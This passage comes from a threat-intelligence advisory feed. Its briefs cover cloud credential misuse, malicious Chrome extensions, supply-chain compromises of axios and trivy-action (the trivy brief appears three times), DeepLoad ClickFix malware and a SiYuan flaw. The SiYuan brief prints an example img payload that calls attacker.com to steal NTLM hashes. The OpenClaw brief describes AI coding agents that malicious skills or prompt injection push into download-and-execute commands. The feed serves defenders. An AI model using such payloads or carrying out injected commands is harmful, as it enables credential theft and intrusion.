<li>The attacker attempts to escalate privileges or move laterally within the AWS environment by exploiting the compromised credentials.</li>
<li>The attacker may create, modify, or delete AWS resources, such as EC2 instances, S3 buckets, or IAM roles, depending on the permissions associated with the stolen credentials.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation leads to unauthorized access to AWS resources, potentially resulting in data breaches, service disruptions, or financial losses. The impact depends on the permissions associated with the stolen AWS credentials. A single compromised credential could expose sensitive data, disrupt critical services, or allow attackers to deploy malicious infrastructure within the victim&rsquo;s AWS environment. Identifying and responding to this threat quickly is vital to minimize damages.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure&rdquo; to your SIEM and tune for your environment to detect suspicious usage patterns.</li>
<li>Rotate the compromised AWS access key in IAM immediately and update the corresponding GitHub repository/organization secret as described in the rule documentation.</li>
<li>Implement OIDC-based authentication (<code>aws-actions/configure-aws-credentials</code> with <code>role-to-assume</code>) instead of long-lived access keys as mentioned in the rule documentation.</li>
<li>If using OIDC, add IP condition policies to the IAM role trust policy to restrict <code>AssumeRoleWithWebIdentity</code> to known GitHub runner IP ranges, based on the information in the rule documentation.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>github</category><category>credential-theft</category><category>initial-access</category><category>lateral-movement</category></item><item><title>Malicious Chrome Extensions Stealing Data and Opening Backdoors</title><link>https://feed.craftedsignal.io/briefs/2026-04-chrome-extension-backdoor/</link><pubDate>Thu, 16 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-chrome-extension-backdoor/</guid><description>A coordinated campaign uses 108 malicious Chrome extensions to steal user data, inject ads, and establish backdoors on over 20,000 systems via a shared command-and-control infrastructure.</description><content:encoded><![CDATA[<p>A coordinated campaign involving 108 malicious Chrome extensions has been discovered. These extensions, distributed through five accounts (GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project), are designed to steal user data, inject ads, and create backdoors. Over 20,000 users have installed these extensions. The extensions provide expected functionality to avoid suspicion, but malicious code runs in the background, communicating with a shared C&amp;C infrastructure to perform nefarious activities. The extensions target various user types by masquerading as Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. This campaign poses a significant threat to user privacy and system security.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Users install malicious Chrome extensions from the Chrome Web Store, believing they are legitimate tools (e.g., Telegram clients, games, enhancers).</li>
<li>Upon installation, the extensions execute JavaScript code in the background.</li>
<li>Extensions designed for credential theft acquire Google OAuth2 Bearer tokens and exfiltrate user information (email, name, profile picture) to a remote server.</li>
<li>Extensions targeting Telegram steal the active Telegram Web session by overwriting local storage with attacker-supplied data and force-reloading Telegram.</li>
<li>Some extensions contain a backdoor that opens an arbitrary URL received from the C&amp;C server in a new tab upon browser start.</li>
<li>Other malicious activities include injecting ads into YouTube and TikTok pages, injecting content scripts into all visited pages, or proxying translation requests through attacker-controlled servers.</li>
<li>The attacker gains access to user accounts (Google, Telegram) and can inject malicious content, redirect traffic, and steal sensitive information.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Over 20,000 users have been affected by these malicious extensions. The campaign targets a broad range of users by using different categories of extensions. Successful exploitation can lead to stolen credentials, account takeover, data exfiltration, ad fraud, and the ability to inject arbitrary content into visited websites. The compromised systems could be used for further malicious activities.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor network connections originating from Chrome extensions for connections to unusual or suspicious domains using a network connection rule (see example rule below).</li>
<li>Implement strict policies for Chrome extension installations, including whitelisting approved extensions and blocking installation from untrusted sources.</li>
<li>Deploy the Sigma rule to detect the execution of scripts from the malicious extensions to your SIEM and tune for your environment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>chrome-extension</category><category>credential-theft</category><category>backdoor</category><category>ad-injection</category><category>exfiltration</category></item><item><title>SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams</title><link>https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/</link><pubDate>Sat, 11 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/</guid><description>SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.</description><content:encoded><![CDATA[<p>SiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with <code>securityLevel: &quot;loose&quot;</code> and <code>htmlLabels: true</code>, which allows <code>&lt;img&gt;</code> tags with <code>src</code> attributes to bypass sanitization and be injected into SVG <code>&lt;foreignObject&gt;</code> blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., <code>//attacker.com/image.png</code>), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim&rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker&rsquo;s server, exfiltrating the victim&rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an <code>&lt;img&gt;</code> tag, such as <code>&lt;img src='//attacker.com/share/img.png'&gt;</code>.</li>
<li>The attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).</li>
<li>The victim opens the note in SiYuan.</li>
<li>SiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.</li>
<li>The SVG containing the malicious <code>&lt;img&gt;</code> tag is injected into the DOM via <code>innerHTML</code>.</li>
<li>The Electron client attempts to fetch the resource at the protocol-relative URL.</li>
<li>On Windows, the protocol-relative URL resolves to a UNC path (<code>\\attacker.com\share\img.png</code>), initiating an SMB connection.</li>
<li>Windows automatically sends the victim&rsquo;s NTLMv2 hash to the attacker&rsquo;s SMB server, or makes an HTTP request leaking victim&rsquo;s IP on other platforms.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim&rsquo;s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim&rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect SiYuan Mermaid NTLM Theft Attempt</code> to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).</li>
<li>Deploy the Sigma rule <code>Detect SiYuan Mermaid SSRF Attempt</code> to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).</li>
<li>Monitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).</li>
<li>Block the attacker&rsquo;s domain (<code>attacker.com</code>) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).</li>
<li>Upgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>siyuan</category><category>ntlm</category><category>ssrf</category><category>credential-theft</category><category>mermaid</category></item><item><title>OpenClaw Agent Suspicious Child Process Execution</title><link>https://feed.craftedsignal.io/briefs/2026-06-openclaw-execution/</link><pubDate>Wed, 08 Apr 2026 12:07:54 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-06-openclaw-execution/</guid><description>Malicious actors are exploiting OpenClaw, Moltbot, and Clawdbot AI coding agents via Node.js to execute arbitrary shell commands and download-and-execute commands, potentially targeting cryptocurrency wallets and credentials.</description><content:encoded><![CDATA[<p>OpenClaw (formerly Clawdbot, rebranded to Moltbot) is an AI coding assistant that can execute shell commands and scripts. Threat actors are exploiting the skill ecosystem (ClawHub) to distribute malicious skills, observed as early as January 2026, that execute download-and-execute commands, targeting cryptocurrency wallets and credentials. These skills are often obfuscated and distributed through public registries like ClawHub. The attacks leverage the AI agents&rsquo; ability to execute commands through skills or prompt injection. Defenders should monitor for suspicious child processes spawned by Node.js processes running OpenClaw/Moltbot, as these may indicate malicious activity originating from compromised or malicious skills. This activity has been observed across Linux, macOS, and Windows environments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A user installs the OpenClaw agent, potentially from a legitimate or typosquatted domain.</li>
<li>The user installs a malicious skill from ClawHub or is subject to a prompt injection attack.</li>
<li>The OpenClaw agent, running under Node.js, receives a command to execute a shell command.</li>
<li>The Node.js process spawns a shell process (e.g., bash, sh, cmd.exe, powershell.exe).</li>
<li>The shell process executes a command to download a payload from a remote server using tools like curl or certutil.</li>
<li>The downloaded payload is saved to disk, often with an obfuscated name.</li>
<li>The shell process executes the downloaded payload using chmod +x and ./, rundll32.exe, or powershell.exe.</li>
<li>The payload performs malicious actions such as credential theft or cryptocurrency wallet compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised OpenClaw agents can lead to cryptocurrency wallet theft, credential compromise, and potential data exfiltration. A successful attack allows threat actors to gain access to sensitive data and potentially pivot to other systems on the network. The number of victims is currently unknown, but the targeting of cryptocurrency wallets suggests financially motivated actors. The observed typosquatting activity indicates a campaign to impersonate the legitimate software and trick users into installing malicious versions.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process creation events for suspicious child processes of Node.js processes running OpenClaw/Moltbot, specifically shells and scripting interpreters, using the provided Sigma rule (<a href="#execution-via-openclaw-agent---linuxmacoswindows">Execution via OpenClaw Agent - Linux/macOS/Windows</a>).</li>
<li>Block known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the DNS resolver based on the IOCs provided.</li>
<li>Implement application control policies to restrict the execution of unsigned or untrusted executables, mitigating the impact of downloaded payloads.</li>
<li>Review OpenClaw skill installation logs and user AI conversation history for signs of malicious activity or prompt injection attempts.</li>
<li>Enable process command-line auditing to capture the full command line of spawned processes, aiding in the identification of malicious commands.</li>
<li>Deploy the Sigma rule to detect execution of curl/certutil downloads (<a href="#openclaw-download-activity">OpenClaw Download Activity</a>).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>ai-agent</category><category>execution</category><category>malware</category><category>credential-theft</category></item><item><title>Amazon Athena ODBC Driver Man-in-the-Middle Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-athena-odbc-mitm/</link><pubDate>Fri, 03 Apr 2026 21:17:12 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-athena-odbc-mitm/</guid><description>A man-in-the-middle vulnerability exists in Amazon Athena ODBC driver versions prior to 2.1.0.0 due to improper certificate validation, potentially allowing attackers to intercept authentication credentials when connecting to external identity providers.</description><content:encoded><![CDATA[<p>A man-in-the-middle (MitM) vulnerability has been identified in the Amazon Athena ODBC driver. Specifically, versions prior to 2.1.0.0 exhibit improper certificate validation within the identity provider connection components. This flaw allows a threat actor positioned in the network to intercept authentication credentials when the driver attempts to connect to external identity providers. This vulnerability, identified as CVE-2026-35560, poses a significant risk to organizations utilizing affected versions of the Athena ODBC driver with external identity providers. The lack of proper certificate validation can lead to credential compromise and subsequent unauthorized access to sensitive data within Athena. This does not affect connections directly to Athena.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker positions themselves in a privileged network location between the user&rsquo;s machine and the external identity provider.</li>
<li>The user attempts to establish a connection to Amazon Athena using the vulnerable ODBC driver version (prior to 2.1.0.0). The connection is configured to use an external identity provider for authentication.</li>
<li>The ODBC driver initiates a connection to the configured external identity provider.</li>
<li>The attacker intercepts the network traffic between the ODBC driver and the identity provider.</li>
<li>Due to the lack of proper certificate validation in the vulnerable ODBC driver, the attacker can present a fraudulent certificate to the driver without triggering an error.</li>
<li>The ODBC driver, trusting the fraudulent certificate, proceeds with the authentication process and transmits the user&rsquo;s credentials to the attacker-controlled server.</li>
<li>The attacker captures the user&rsquo;s authentication credentials (e.g., username and password or an access token).</li>
<li>The attacker uses the stolen credentials to authenticate to the external identity provider or directly to resources protected by those credentials, potentially gaining unauthorized access to sensitive data within Amazon Athena or other connected services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a man-in-the-middle attacker to intercept authentication credentials used to connect to external identity providers. This could lead to unauthorized access to an organization&rsquo;s Amazon Athena data and other resources protected by the compromised credentials. The severity of the impact depends on the privileges associated with the compromised user account. If successful, the attacker could potentially read, modify, or delete sensitive data stored in Athena, leading to data breaches, financial losses, and reputational damage. The number of potential victims is directly proportional to the number of organizations using affected versions of the Athena ODBC driver with external identity providers.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the Amazon Athena ODBC driver to version 2.1.0.0 or later to remediate the improper certificate validation vulnerability as documented in CVE-2026-35560.</li>
<li>Monitor network traffic for unexpected connections to external identity providers from machines running the Athena ODBC driver. Use network connection logs to identify suspicious activity.</li>
<li>Implement network segmentation to limit the potential impact of a successful man-in-the-middle attack, reducing the attacker&rsquo;s ability to intercept traffic.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-35560</category><category>athena</category><category>odbc</category><category>man-in-the-middle</category><category>mitm</category><category>credential-theft</category></item><item><title>Compromised Axios Library Leads to RAT Deployment via @usebruno/cli</title><link>https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/</link><pubDate>Fri, 03 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/</guid><description>Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential exfiltration.</description><content:encoded><![CDATA[<p>On March 31, 2026, a supply chain attack targeted the <code>axios</code> npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of <code>@usebruno/cli</code>. This attack specifically impacted users of the <code>@usebruno/cli</code> who performed an <code>npm install</code> within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the <code>postinstall</code> phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker compromises the <code>axios</code> npm package, injecting malicious code into versions 1.14.1 and 0.30.4.</li>
<li>The compromised <code>axios</code> package is published to the npm registry.</li>
<li>A user of <code>@usebruno/cli</code> executes <code>npm install</code> within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).</li>
<li>The npm package manager resolves the dependency chain and downloads the compromised <code>axios</code> package as a dependency of <code>@usebruno/cli</code>.</li>
<li>The malicious code within the <code>axios</code> package executes during the <code>postinstall</code> script phase of the installation process.</li>
<li>The <code>postinstall</code> script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user&rsquo;s system.</li>
<li>The RAT establishes a connection to a remote command-and-control (C2) server.</li>
<li>The attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack could have resulted in widespread compromise of developer systems that used the <code>@usebruno/cli</code>. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>If <code>@usebruno/cli</code> was installed during the affected window, reinstall dependencies to ensure a clean version of <code>axios</code> is used (reference: Impact section).</li>
<li>Rotate all credentials and secrets that were present on systems where <code>@usebruno/cli</code> was installed during the affected window (reference: Impact section).</li>
<li>Review and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: <a href="https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)">https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)</a>.</li>
<li>Monitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - &ldquo;Detect Suspicious Process Spawned by NPM&rdquo;).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>npm</category><category>rat</category><category>credential-theft</category></item><item><title>DeepLoad Malware Distributed via ClickFix</title><link>https://feed.craftedsignal.io/briefs/2026-04-deepload-malware/</link><pubDate>Thu, 02 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-deepload-malware/</guid><description>The DeepLoad malware steals credentials, installs malicious browser extensions, spreads via USB drives, and is being distributed via ClickFix campaigns using PowerShell loaders.</description><content:encoded><![CDATA[<p>DeepLoad is a recently discovered malware family designed for credential theft, malicious browser extension installation, and potential cryptocurrency theft. First advertised on a dark web forum in early February 2026, DeepLoad is now being distributed in the wild via ClickFix campaigns. The malware is delivered through fake browser error messages that instruct victims to execute a PowerShell command, resulting in the persistent execution of a PowerShell loader. This loader dynamically generates a DLL component in the Temp directory to evade detection. DeepLoad also injects into the legitimate <code>LockAppHost.exe</code> process to further blend into trusted Windows activity and evade detection by security tools. The threat actor&rsquo;s motivations appear to be financially driven, focusing on credential and cryptocurrency theft.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The victim encounters a fake browser error message.</li>
<li>The victim is instructed to paste a command into Windows Run or a terminal.</li>
<li>The command executes a PowerShell loader, which is designed for persistence.</li>
<li>The PowerShell loader drops a DLL component in the Temp directory, compiled on every execution with a different filename.</li>
<li>The loader disables PowerShell command history and calls Windows core functions directly to evade monitoring.</li>
<li>The DLL is injected into <code>LockAppHost.exe</code> using asynchronous procedure call (APC) injection.</li>
<li>DeepLoad steals credentials via a standalone credential stealer executed alongside the main loader.</li>
<li>A rogue browser extension is dropped to intercept user activity, including logins, open tabs, session tokens, and saved passwords. The malware also attempts to spread via USB drives.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful DeepLoad infections can lead to significant credential theft, potentially compromising sensitive user accounts and data. The rogue browser extension can expose all user browser activity, including banking and cryptocurrency exchanges. The spread via USB drives allows the malware to propagate rapidly across an organization. The financial impact can be substantial if cryptocurrency wallets and other financial accounts are compromised. The number of affected organizations is currently unknown.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the &ldquo;Detect DeepLoad PowerShell Loader&rdquo; Sigma rule to detect the initial PowerShell execution used to deliver the malware.</li>
<li>Monitor process injection into <code>LockAppHost.exe</code> to identify potential DeepLoad infections (reference the Sigma rule &ldquo;Detect Injection into LockAppHost.exe&rdquo;).</li>
<li>Enable PowerShell logging and review for suspicious command line arguments indicative of the DeepLoad loader to enhance the effectiveness of the &ldquo;Detect DeepLoad PowerShell Loader&rdquo; rule.</li>
<li>Implement USB drive security policies to prevent the spread of malware via removable media.</li>
<li>Educate users on the risks of executing commands from untrusted sources to prevent initial infection via ClickFix techniques.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>deepload</category><category>clickfix</category><category>credential-theft</category><category>windows</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/</link><pubDate>Tue, 31 Mar 2026 08:36:29 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-trivy-supply-chain/</guid><description>The trivy-action GitHub Action was compromised via git tag repointing, where 76 of 77 release tags were retroactively poisoned, leading to a multi-stage credential theft operation discovered following a spike in script execution detections on Linux runners.</description><content:encoded><![CDATA[<p>On March 19, 2026, CrowdStrike detected a spike in script execution on Linux-based GitHub Actions runners. Investigation traced the activity to a compromise of the aquasecurity/trivy-action GitHub Action, a widely used open-source vulnerability scanner in CI/CD pipelines. The compromise involved retroactively poisoning 76 of the scanner&rsquo;s 77 release tags through git tag repointing. This replaced the legitimate entry point with a multi-stage credential stealer. The malicious code ran before the actual scanner, making the compromise difficult to detect as workflows appeared to complete normally. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary, and removed the malicious artifacts. This supply chain attack highlights the risk of relying on third-party actions in CI/CD pipelines without proper verification and monitoring.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A developer pushes code, opens a pull request, or merges a branch in a repository using the compromised trivy-action.</li>
<li>The GitHub Actions runner executes the workflow, downloading the specified version of the trivy-action. Due to tag repointing, a malicious version of the action is downloaded instead of the legitimate one.</li>
<li>The malicious <code>entrypoint.sh</code> script is executed, which prepends approximately 105 lines of attack code before the original Trivy scanner logic.</li>
<li>The malicious script enumerates process IDs (PIDs) on the runner to identify potential targets.</li>
<li>The script executes a multi-stage credential theft operation, stealing secrets and credentials available within the runner environment.</li>
<li>The legitimate Trivy scanner is executed after the malicious code, masking the compromise as the workflow appears to complete successfully.</li>
<li>Stolen credentials are exfiltrated to a destination controlled by the attacker.</li>
<li>The attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain compromise affected users of the aquasecurity/trivy-action GitHub Action. The retroactive poisoning of 76 release tags meant that any CI/CD pipeline using those versions of the action was potentially compromised. The impact included the potential theft of sensitive credentials, secrets, and API keys stored within the GitHub Actions runner environment. Successful credential theft could lead to unauthorized access to critical infrastructure, data breaches, and further downstream attacks. The number of affected organizations is unknown, but given the popularity of trivy-action, the scope could be significant.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Review your GitHub Actions workflows for usage of <code>aquasecurity/trivy-action</code> and verify the integrity of the action&rsquo;s code. Consider pinning to specific commit SHAs instead of tags to avoid tag repointing attacks.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Script Execution in GitHub Actions Runner</code> to identify potentially malicious script execution within GitHub Actions runner environments.</li>
<li>Monitor process execution on GitHub Actions runners for unusual or unexpected activity, particularly scripts running from temporary directories, to detect deviations from expected CI/CD behavior.</li>
<li>Implement strict access controls and credential management policies for GitHub Actions secrets and credentials to minimize the impact of potential credential theft.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>github-actions</category><category>credential-theft</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/</link><pubDate>Tue, 31 Mar 2026 07:24:09 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-trivy-action-supply-chain/</guid><description>The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting malicious code into the entrypoint.sh script to steal credentials from CI/CD pipelines before executing the legitimate Trivy scanner.</description><content:encoded><![CDATA[<p>On March 19, 2026, a spike in suspicious script executions on Linux GitHub Actions runners was observed across multiple CrowdStrike Falcon platform customers. The investigation traced the activity to a supply chain compromise within the widely-used aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. Attackers retroactively poisoned 76 out of 77 release tags by repointing them to malicious commits. This allowed them to inject a multi-stage credential stealer into the action&rsquo;s <code>entrypoint.sh</code> script. The malicious code executes before the legitimate scanner, making the compromise less noticeable. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary and has removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to exploit tag mutability in Git.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains unauthorized write access to the <code>aquasecurity/trivy-action</code> GitHub repository.</li>
<li>The attacker retroactively modifies existing Git tags (e.g., <code>0.24.0</code>) to point to a malicious commit.</li>
<li>The malicious commit injects approximately 105 lines of malicious code into the <code>entrypoint.sh</code> script, prepended before the legitimate Trivy scanner logic.</li>
<li>A GitHub Actions workflow includes a step using the compromised <code>aquasecurity/trivy-action</code> by referencing a poisoned tag (e.g., <code>- uses: aquasecurity/trivy-action@0.24.0</code>).</li>
<li>When the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious <code>entrypoint.sh</code> script.</li>
<li>The malicious code in <code>entrypoint.sh</code> enumerates running processes to identify potential credential sources and exfiltrates sensitive data.</li>
<li>The legitimate Trivy scanner executes, masking the malicious activity.</li>
<li>The attacker gains access to stolen credentials, secrets, and API keys, potentially allowing them to compromise cloud infrastructure, internal systems, and source code repositories.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack directly impacted organizations using the compromised <code>aquasecurity/trivy-action</code> GitHub Action in their CI/CD pipelines. The number of affected organizations is currently unknown, but given the action&rsquo;s popularity, it is likely significant. Successful exploitation allows attackers to steal sensitive credentials, including API keys, cloud credentials, and deploy tokens. This can lead to unauthorized access to internal infrastructure, data exfiltration, and further compromise of the software supply chain. The incident highlights the critical importance of verifying the integrity of third-party dependencies and implementing robust security measures in CI/CD environments.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately audit your GitHub Actions workflows for usage of the <code>aquasecurity/trivy-action</code> and update to a safe version (as provided by Aqua Security) or remove the action entirely.</li>
<li>Implement integrity checks for third-party GitHub Actions by verifying the commit SHA instead of relying solely on tags to mitigate tag re-pointing attacks.</li>
<li>Monitor process execution on GitHub Actions runners for suspicious scripts, especially those running from within action directories, using process creation logs. An example detection rule is provided below.</li>
<li>Enable network connection logging on GitHub Actions runners to identify potential data exfiltration attempts originating from action scripts.</li>
<li>Review GitHub Actions logs for any anomalies or unexpected behavior that may indicate a compromise.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>github-actions</category><category>credential-theft</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/</link><pubDate>Tue, 31 Mar 2026 06:07:07 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/</guid><description>The trivy-action GitHub Action, a widely used vulnerability scanner in CI/CD pipelines, was compromised via git tag repointing to inject a multi-stage credential stealer, affecting 76 of 77 release tags.</description><content:encoded><![CDATA[<p>On March 19, 2026, CrowdStrike detected a spike in suspicious script executions on Linux-based GitHub Actions runners, which led to the discovery of a supply chain compromise affecting the <code>aquasecurity/trivy-action</code> GitHub Action. This action is a popular open-source vulnerability scanner frequently used in CI/CD pipelines. The attacker retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. These commits replaced the legitimate entry point with a multi-stage credential stealer. The injected code executes before the original scanner, allowing workflows to complete seemingly normally while secretly exfiltrating sensitive information. Aqua Security has confirmed and removed the malicious artifacts. This incident highlights the risks associated with mutable tags in Git-based workflows and the importance of verifying action integrity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains write access to the <code>aquasecurity/trivy-action</code> repository on GitHub.</li>
<li>The attacker modifies the action&rsquo;s <code>entrypoint.sh</code> script to include malicious code for credential theft. Specifically, the attacker prepends approximately 105 lines of malicious code.</li>
<li>The attacker uses git tag repointing to retroactively poison existing release tags (e.g., <code>@0.24.0</code>) to point to the malicious commit.</li>
<li>Developers&rsquo; CI/CD pipelines reference the compromised <code>trivy-action</code> using a poisoned tag (e.g., <code>aquasecurity/trivy-action@0.24.0</code>).</li>
<li>When a workflow runs, the GitHub Actions runner downloads and executes the malicious <code>entrypoint.sh</code> script, granting it access to the runner&rsquo;s environment, secrets, and network.</li>
<li>The malicious script enumerates running processes to identify potential targets for credential theft.</li>
<li>The malicious code exfiltrates credentials and secrets.</li>
<li>The original <code>trivy</code> scanner is executed, masking the malicious activity and allowing the workflow to complete normally.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the <code>trivy-action</code> GitHub Action allowed attackers to steal credentials and secrets from CI/CD pipelines that used the compromised action. Because the malicious code ran with the full privileges of the runner, it had access to sensitive information such as API keys, deployment tokens, and cloud credentials. The number of affected organizations is unknown, but given the widespread adoption of <code>trivy-action</code>, the potential impact is significant. Successful exploitation can lead to unauthorized access to cloud resources, code repositories, and other sensitive systems.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect your CI/CD pipeline configurations for usage of the <code>aquasecurity/trivy-action</code> and audit the integrity of the referenced tags against the known good commits, if available from Aqua Security&rsquo;s advisories.</li>
<li>Implement tooling and processes to verify the integrity of third-party GitHub Actions used in CI/CD pipelines.</li>
<li>Monitor process execution on GitHub Actions runners for suspicious activity, such as enumeration of processes or unexpected network connections (see Sigma rule below).</li>
<li>Enable and review process creation logs on CI/CD runner environments to identify anomalous script execution (see Sigma rule below).</li>
</ul>
